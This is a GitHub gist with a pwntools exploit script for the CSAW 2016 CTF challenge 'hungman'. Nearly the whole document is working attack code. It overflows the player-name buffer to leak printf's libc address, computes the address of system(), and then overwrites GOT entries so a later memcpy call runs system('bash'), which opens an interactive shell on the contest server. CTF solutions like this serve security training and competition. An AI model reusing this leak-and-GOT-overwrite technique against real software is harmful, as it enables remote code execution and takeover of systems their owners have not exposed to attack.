Last active
November 15, 2017 19:40
-
-
Save hugsy/b028f7268ca90f4a51640b28e0f04116 to your computer and use it in GitHub Desktop.
csaw 2016 - hungman - pwn 300
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # csaw 2016 - hungman - pwn 300 | |
| # | |
| # @_hugsy_ & @rick2600 | |
| # | |
| from pwn import * | |
| context.update(arch="amd64", os="linux", log_level = "info") | |
| import random, string, time | |
| host, port = "pwn.chal.csaw.io", 8003 | |
| r = remote(host, port) | |
| log.info("step 1: leaking libc + overwritting namelen") | |
| r.recvuntil("What's your name?\n") | |
| r.send("A"*80) | |
| r.recvuntil("_\n") | |
| ## generate new highscore | |
| r.sendline("p") | |
| r.recvline() | |
| r.sendline("l") | |
| r.recvline() | |
| r.sendline("o") | |
| r.recvline() | |
| r.sendline("m") | |
| r.recvline() | |
| ## reach "change name" at 0400E16 | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| r.recvline() | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| r.recvline() | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| if "change name" not in r.recvline(): | |
| raise Exception("bail") | |
| r.sendline("y") | |
| printf_got = 0x602040 | |
| score = "B"*4 | |
| namelen = p32(0x500) # << size of malloc is controlled | |
| name = p64(printf_got) | |
| p = "A"*96 + score + namelen + name | |
| r.send(p) | |
| res = r.recvuntil(" score", drop=True).split("Highest player: ")[1] | |
| res+= "\x00"*(8-len(res)) | |
| printf_libc = u64(res) | |
| log.success("printf@libc is at %#x" % printf_libc) | |
| libc_base = printf_libc - 0x557b0 | |
| system_libc = libc_base + 0x45380 | |
| log.success("libc_base is at %#x" % libc_base) | |
| log.success("system@libc is at %#x" % system_libc) | |
| r.recvuntil("Continue? ") | |
| r.sendline("y") | |
| log.info("step 2: control pc") | |
| ## re-regenerate a new highscore | |
| r.recvuntil("_\n") | |
| r.sendline("p") | |
| r.recvline() | |
| r.sendline("l") | |
| r.recvline() | |
| r.sendline("o") | |
| r.recvline() | |
| r.sendline("m") | |
| r.recvline() | |
| r.sendline("y") | |
| r.recvline() | |
| r.sendline("t") | |
| r.recvline() | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| r.recvline() | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| r.recvline() | |
| r.sendline("p") | |
| r.recvuntil("nope\n") | |
| if "change name" not in r.recvline(): | |
| raise Exception("bail2") | |
| r.sendline("y") | |
| #raw_input("attach") | |
| log.info("fire !!!") | |
| p = "" | |
| p += "bash\x00\x00\x00\x00" # printf@got | |
| p += p64(0x400866) # snprintf@got | |
| p += p64(0x400e7c) # memset@got make it to call memcpy() in the path | |
| p += p64(0) | |
| p += p64(0) | |
| p += p64(0) | |
| p += p64(0) | |
| p += p64(system_libc) # memcpy@got will call system() | |
| r.sendline(p) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment